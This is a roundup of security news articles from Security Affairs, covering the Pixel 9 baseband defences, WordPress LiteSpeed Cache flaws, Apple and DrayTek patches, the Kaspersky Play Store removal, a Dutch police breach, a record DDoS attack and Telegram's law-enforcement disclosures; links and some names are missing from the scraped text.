Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape.

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape.

****      

Follow me on Twitter: and and Mastodon

(SecurityAffairs – hacking, malware)

Google announced that its Pixel 9 has implemented new security features, and it supports measures to mitigate baseband attacks.

Pixel phones are known for their strong security features, particularly in protecting the cellular baseband, which is the processor handling LTE, 4G, and 5G communications. While basebands in smartphones are often vulnerable to attacks due to performance constraints, Pixel has implemented security hardening measures for years. Google claims that the Pixel 9 implements the most secure baseband to date, addressing a critical attack vector exploited by researchers.

The cellular baseband manages a smartphone’s network connectivity and processes external inputs, including those from untrusted sources. In the past, researchers documented multiple attacks relying on to target mobile devices. Threat actors can remotely carry out these kinds of attacks through protocols like IMS.

“malicious actors can . In certain protocols like IMS (IP Multimedia Subsystem), this can be executed remotely from any global location using an IMS client.” reads .

Baseband firmware can be affected by vulnerabilities, making it a significant attack vector. Exploiting baseband bugs can lead to remote code execution.

Experts warn that most smartphone basebands lack exploit mitigations commonly used in software development. Zero-day brokers and can exploit these vulnerabilities to target mobile users and deploy malware like . Baseband exploits are frequently listed in exploit marketplaces with low payouts, indicating their abundance. In response, Android and Pixel have strengthened their Vulnerability Rewards Program, prioritizing the identification and resolution of connectivity firmware vulnerabilities.

Pixel has added proactive defenses over the years, key security measures implemented in the Pixel 9 series include:

• Bounds Sanitizer: Prevents memory corruption by ensuring memory access stays within bounds.
• Integer Overflow Sanitizer: Eliminates memory corruption from numeric overflows.
• Stack Canaries: Detects and alerts the system to potential stack-related attacks.
• Control Flow Integrity (CFI): Restricts code execution to approved paths, preventing unauthorized paths.
• Auto-Initialize Stack Variables: Prevents vulnerabilities by automatically initializing stack memory to zero.

Additionally, bug detection tools like are used during testing to patch bugs before shipping.

“Security hardening is difficult and our work is never done, but when these security measures are combined, they significantly increase Pixel 9’s resilience to baseband attacks.” concludes the announcement. “Pixel’s proactive approach to security demonstrates a commitment to protecting its users across the entire software stack. Hardening the cellular baseband against remote attacks is just one example of how Pixel is constantly working to stay ahead of the curve when it comes to security.”

Follow me on Twitter:  and  and Mastodon

(SecurityAffairs – hacking, Google Pixel)

A high-severity flaw in the WordPress LiteSpeed Cache plugin could allow attackers to execute arbitrary JavaScript code under certain conditions.

A high-severity security flaw, tracked as CVE-2024-47374 (CVSS score 7.2), in the LiteSpeed Cache plugin for WordPress could allow attackers to execute arbitrary JavaScript.

The vulnerability is a stored cross-site scripting (XSS) issue impacting versions up to 6.5.0.2.

This LiteSpeed Cache plugin is an all-in-one site acceleration tool, offering server-level caching and optimization features. It supports WordPress Multisite and is compatible with popular plugins like WooCommerce, bbPress, and Yoast SEO. LiteSpeed has over six million active installations, for this reason, site admins must address the issue as soon as possible.

The vulnerability was originally reported by  to the . 

“This plugin suffers from unauthenticated stored XSS vulnerability. It could allow any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by performing a single HTTP request.” the advisory.

The flaw arises from improper sanitization of the “X-LSCACHE-VARY-VALUE” HTTP header, allowing arbitrary script injection. The issue could be exploited only if the “CSS Combine” and “Generate UCSS” settings are enabled.

An attacker could potentially exploit this vulnerability to hijack the account of a site administrator and take full control of the website.

The vulnerability was addressed in version 6.5.1 on September 25, 2024.

The most damaging scenario is when the hijacked user account is that of a site administrator, thereby allowing a threat actor to completely take control of the website and stage even more powerful attacks.

“We recommend applying escaping and sanitization to any message that will be displayed as an admin notice. Depending on the context of the data, we recommend using  to sanitize value for HTML output (outside of HTML attribute) or . For escaping values inside of attributes, you can use the function.” concludes the report. “We also recommend applying a proper permission or authorization check to the registered rest route endpoints.”

In early September, the developer behind the LiteSpeed Cache plugin another unauthenticated account takeover vulnerability, tracked as CVE-2024-44000 (CVSS score: 7.5), that can allow any visitor to gain access to logged-in users and potentially escalate privileges to the Administrator level. An attacker can exploit this vulnerability to upload malicious plugins.

Patchstack researchers explained that the flaw stems from an HTTP response header leak that exposed “Set-Cookie” headers in a debug log file (/wp-content/debug.log) after login attempts.

An unauthenticated attacker can view sensitive information, including user cookie data from HTTP response headers. This could enable attackers to log in using any valid session. The flaw can be exploited only if the WordPress site’s debug feature is enabled and this feature is disabled by default.

“The vulnerability exploits an HTTP response headers leak on the debug log file which also leaks the “Set-Cookie” header after the users perform a login request.” reads the  published by Patchstack. “The main vulnerable code exists on the function ended“

The vulnerability CVE-2024-44000 impacts versions before and including 6.4.1. The issue has been addressed in version 6.5.0.1.

Follow me on Twitter:  and  and Mastodon

(SecurityAffairs – hacking, WordPress)

Apple released iOS 18.0.1 update that addressed two vulnerabilities that exposed passwords and audio snippets to attackers.

Apple released updates to fix two vulnerabilities, respectively tracked as CVE-2024-44207 and CVE-2024-44204.

The company addressed the vulnerability by improving checks. The flaw was reported by Michael Jimenez and an anonymous researcher.

The vulnerability CVE-2024-44207 may allow threat actors to capture short snippets of audio messages in Messages before the microphone indicator is activated. 

The vulnerability CVE-2024-44204 is a logic issue that could potentially enable VoiceOver to read aloud users’ saved passwords. The issue was addressed with improved validation, it was reported by the researcher Bistrit Dahal.

Apple is not aware of attack in the wild exploiting the above vulnerabilities.

Follow me on Twitter:  and  and Mastodon

(SecurityAffairs – hacking, )

Google removed Kaspersky ‘s Android security apps from the Play Store and suspended its developer accounts over the weekend.

Over the weekend, all the Android products designed by the Russian cybersecurity firm Kaspersky were removed from the official Google Play in the United States and other countries.

Google also  the developer accounts used by the cybersecurity firm.

The Kaspersky employee who goes online with the handle MedvedevUnited confirmed on the company’s official forum that the downloads and updates of Kaspersky products are temporarily unavailable on the Google Play store.

“The downloads and updates of Kaspersky products are temporarily unavailable on the Google Play store.” . “Kaspersky is currently investigating the circumstances behind the issue and exploring potential solutions to ensure that users of its products can continue downloading and updating their applications from Google Play. We apologize for any inconvenience this may cause.” 

The Kaspersky employee suggests customers continue downloading and updating Kaspersky products from other mobile stores, including Galaxy Store, Huawei AppGallery, and Xiaomi GetApps.

In July 2024, Kaspersky its exit from the U.S. market following  by the Commerce Department.

In June, the Biden administration announced the ban on the sale of Kaspersky antivirus software due to the risks posed by Russia to U.S. national security. The U.S. government is implementing a new rule leveraging powers established during the Trump administration to ban the sale of Kaspersky software, citing national security risks posed by Russia.

The Commerce Department’s Bureau of Industry and Security banned the Russian cybersecurity firm because it is based in Russia.

Government experts believe that the influence of the Kremlin over the company poses a significant risk, . Russia-linked actors can abuse the software’s privileged access to a computer system to steal sensitive information from American computers or spread malware, Commerce Secretary Gina Raimondo said on a briefing call with reporters on Thursday.

“Russia has shown it has the capacity and… the intent to exploit Russian companies like Kaspersky to collect and weaponize the personal information of Americans and that is why we are compelled to take the action that we are taking today,” Raimondo said on the call.

This isn’t the first time Western governments have banned Kaspersky, but the Russian firm has always denied any link with the Russian government.

Reuters reported that the U.S. government plans to add three units of the cybersecurity company to a trade restriction list. The move will significantly impact the company’s sales in the U.S. and potentially in other Western countries that may adopt similar restrictions against the security firm.

Google confirmed that it blocked Kaspersky and its products on the Play Store following restrictions imposed by the U.S. Department of Commerce’s Bureau of Industry and Security.

Below is the statement :

“The U.S. Department of Commerce’s Bureau of Industry and Security recently announced a variety of restrictions on Kaspersky. As a result, we have removed Kaspersky’s apps from Google Play,”

Follow me on Twitter:  and  and Mastodon

(SecurityAffairs – hacking, Google)

The Dutch government blames a “state actor” for hacking a police system, exposing the contact details of all police officers, according to the justice minister.

The Dutch police blame a state actor for the recent data breach that exposed officers’ contact details, the justice minister told lawmakers.

The incident took place on September 26, 2024, and the police have reported the security breach to the Data Protection Authority.

Threat actors broke into a police system and gained access to work-related contact details of multiple officers. The attackers had access to names, emails, phone numbers, and some private information belonging to police officers.

“Last week it became known that a police account was hacked. Work-related contact details of police officers were stolen.” reads the data breach notice published by Dutch police. “Apart from the names of colleagues, it does not concern private data or research data. Specialists within the police are investigating the impact of the incident.”

The police state that internal cyber specialists are investigating the security breach and the investigation is still ongoing. The Dutch police announced that they have identified the attackers, however, they haven’t publicly attributed it to a specific actor.

“The police have been informed by the intelligence services that it is very likely a ‘state actor’, in other words: another country or perpetrators on behalf of another country.” reads the update on the data breach published by Dutch Polite. “Based on the information from the intelligence services, the police immediately implemented strong security measures against this attack. In order not to make the perpetrators any wiser and not to harm further investigation, no more can be said at this time.” 

Dutch intelligence agencies believe it is highly likely that a state actor was behind the recent police data breach. Justice Minister David van Weel assured lawmakers that police and national security partners are working to protect impacted officers and prevent further damage.

“Nine Kooiman, chair of the Netherlands Police Union, called the hack “a nightmare. It is now important to protect data, protect colleagues” and track down the perpetrators.” the Associated Press.

Follow me on Twitter:  and  and Mastodon

(SecurityAffairs – hacking, Dutch police)

Cloudflare recently mitigated a new record-breaking DDoS attack, peaking at 3.8 Tbps and 2.14 billion packets per second (Pps).

Cloudflare reported that starting from early September, it has mitigated over 100 hyper-volumetric L3/4 DDoS attacks, with many exceeding 2 billion Pps and 3 Tbps. The largest DDoS attack peaked at 3.8 Tbps, that is the highest ever publicly disclosed.

“Cloudflare’s defenses mitigated over one hundred hyper-volumetric L3/4 DDoS attacks throughout the month, with many exceeding 2 billion packets per second (Bpps) and 3 terabits per second (Tbps). The largest attack peaked 3.8 Tbps — the largest ever disclosed publicly by any organization. Detection and mitigation was fully autonomous” reads the published by Cloudflare.

The company pointed out that it has detected and mitigated the attack with its automated processes.

The scale and frequency of recent DDoS attacks are unprecedented, with experts warning they could overwhelm unprotected internet infrastructure.

The campaign that started in September targets the financial, internet, and telecom industries. The DDoS attacks predominantly use UDP traffic originated from compromised devices globally, with major sources in Vietnam, Russia, Brazil, Spain, and the US.

The experts noticed that high packet rate attacks is generated from compromised MikroTik devices, DVRs, and web servers, while high bitrate attacks are linked to compromised ASUS routers, likely exploited via a (, CVSS score of 9.8) in ASUS routers.

The previous record-breaking volumetric DDoS attack was reported by Microsoft in late 2021, peaking at with a packet rate of 340 million Pps. The largest attack previously seen by Cloudflare peaked at .

“The scale and frequency of these attacks are unprecedented. Due to their sheer size and bits/packets per second rates, these attacks have the ability to take down unprotected Internet properties, as well as Internet properties that are protected by on-premise equipment or by cloud providers that just don’t have sufficient network capacity or global coverage to be able to handle these volumes alongside legitimate traffic without impacting performance.” concludes Cloudflare. “Cloudflare, however, does have the network capacity, global coverage, and intelligent systems needed to absorb and automatically mitigate these monstrous attacks.”

Follow me on Twitter:  and  and Mastodon

(SecurityAffairs – hacking, DDoS attack)

Telegram fulfilled over a dozen U.S. law enforcement data requests this year, potentially revealing the IP addresses or phone numbers of 100+ users.

Independent website 404 Media first revealed that in 2024 Telegram has fulfilled more than a dozen law enforcement data requests from the U.S. authorities.

The social media platform “potentially revealed” that it has shared the IP addresses or phone numbers of over 100 users with law enforcement.

In the past, Telegram claimed that it has never supported law enforcement investigations, however recently it has updated its with authorities.

At the end of September, Telegram updated its privacy policy informing users that it will share users’ phone numbers and IP addresses with law enforcement in response to valid legal requests.

The company CEO  announced the policy update. Telegram will comply with requests from law enforcement if the user under investigation is found to be violating the platform’s rules.

“If Telegram receives a valid order from the relevant judicial authorities that confirms you’re a suspect in a case involving criminal activities that violate the Telegram Terms of Service, we will perform a legal analysis of the request and may disclose your IP address and phone number to the relevant authorities. If any data is shared, we will include such occurrences in a quarterly transparency report published at: https://t.me/transparency.” .

In a message on its Telegram Channel, Durov revealed that over the last few weeks, a dedicated team of moderators, leveraging AI, has worked on its platform to identify and remove problematic content from the app.

The company announced that data shared with authorities will be disclosed in the company’s quarterly transparency reports, accessible via a .

According to the “Transparency report for the period 01.01.24–30.09.24,” the number of “Fulfilled requests from the United States of America for IP address and/or phone number: 14. Affected users: 108.” Some data requests, likely occurred before Telegram’s CEO was .

“For example, in Brazil, we disclosed data for 75 legal requests in Q1 (January-March) 2024, 63 in Q2, and 65 in Q3. In India, our largest market, we satisfied 2461 legal requests in Q1, 2151 in Q2, and 2380 in Q3.” Durov wrote on his Telegram channel. “In Europe, there was an uptick in the number of valid legal requests we received in Q3. This increase was caused by the fact that more EU authorities started to use the correct communication line for their requests, the one mandated by the EU DSA law. Information about this contact point has been publicly available to anyone who viewed the Telegram website or googled “Telegram EU address for law enforcement” since early 2024.”

Despite 404 Media report, at the time of this writing, I’m not able to retrieve the report from the bot.

Follow me on Twitter:  and  and Mastodon

(SecurityAffairs – hacking, Telegram)

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Endpoint Manager (EPM) vulnerability to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA)  the Ivanti Virtual Traffic Manager authentication bypass vulnerability (CVSS score of 9.6) to its .

In May, Ivanti security patches to address multiple critical vulnerabilities in the Endpoint Manager (EPM), including CVE-2024-29824.

The vulnerability is an unspecified SQL Injection issue in Core server of Ivanti EPM 2022 SU5 and prior. An unauthenticated attacker within the same network could exploit the vulnerability to execute arbitrary code.

At the time of its disclosure, the company reported that it was not aware of attacks in the wild exploiting the vulnerability.

According to , FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend private organizations review the  and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix this vulnerability by October 23, 2024.

Follow me on Twitter:  and  and Mastodon

(SecurityAffairs – hacking, )

Multiple flaws in DrayTek residential and enterprise routers can be exploited to fully compromise vulnerable devices.

Forescout researchers discovered 14 new vulnerabilities in DrayTek routers, two of which have been rated as critical. Of the 14 security flaws nine are rated high, and three are rated medium in severity.

The flaws impact residential and enterprise routers manufactured by DrayTek that could be exploited to take over susceptible devices.

The experts reported that over 704,000 DrayTek routers are exposed online in 168 countries, posing a serious risk to customers.

Vulnerabilities in these devices could be exploited for cyber espionage, data theft, ransomware and DoS attacks. On September 18, 2024, the FBI dismantled a botnet exploiting three DrayTek CVEs, and CISA recently two more to its Known Exploited Vulnerabilities list.

“Since 75% of these routers are used in commercial settings, the implications for business continuity and reputation are severe. A successful attack could lead to significant downtime, loss of customer trust and regulatory penalties, all of which fall squarely on a CISO’s shoulders.” reads the published by Forescout.

The most severe vulnerability, tracked as CVE-2024-41592 (CVSS score 10), is a DoS/RCE issue.

“The “GetCGI()” function in the Web UI, responsible for retrieving HTTP request data, is vulnerable to a buffer overflow when processing the query string parameters.” reads the advisory.

The second critical issue, tracked as CVE-2024-41585, is an OS command exec / VM escape vulnerability.

The “recvCmd” binary, which facilitates communication between the host and guest operating systems, is vulnerable to OS command injection attacks.

DrayTek already  security updates to address the vulnerabilities reported by Forescout.

At this time, the company is not aware of attacks in the wild exploring the above vulnerabilities.

“While the extent of these findings was beyond expectation, it was not entirely surprising. DrayTek is among many vendors that does not appear to conduct the necessary variant analysis and post-mortem analysis after vulnerability reports — which could lead to long-term improvements.” concludes the report. “Compared to our research on OT, we found a smaller percentage of unpatched and end-of-life IT routers in DrayTek compared to OT routers (Sierra Wireless).

Follow me on Twitter:  and  and Mastodon

(SecurityAffairs – hacking, IoT)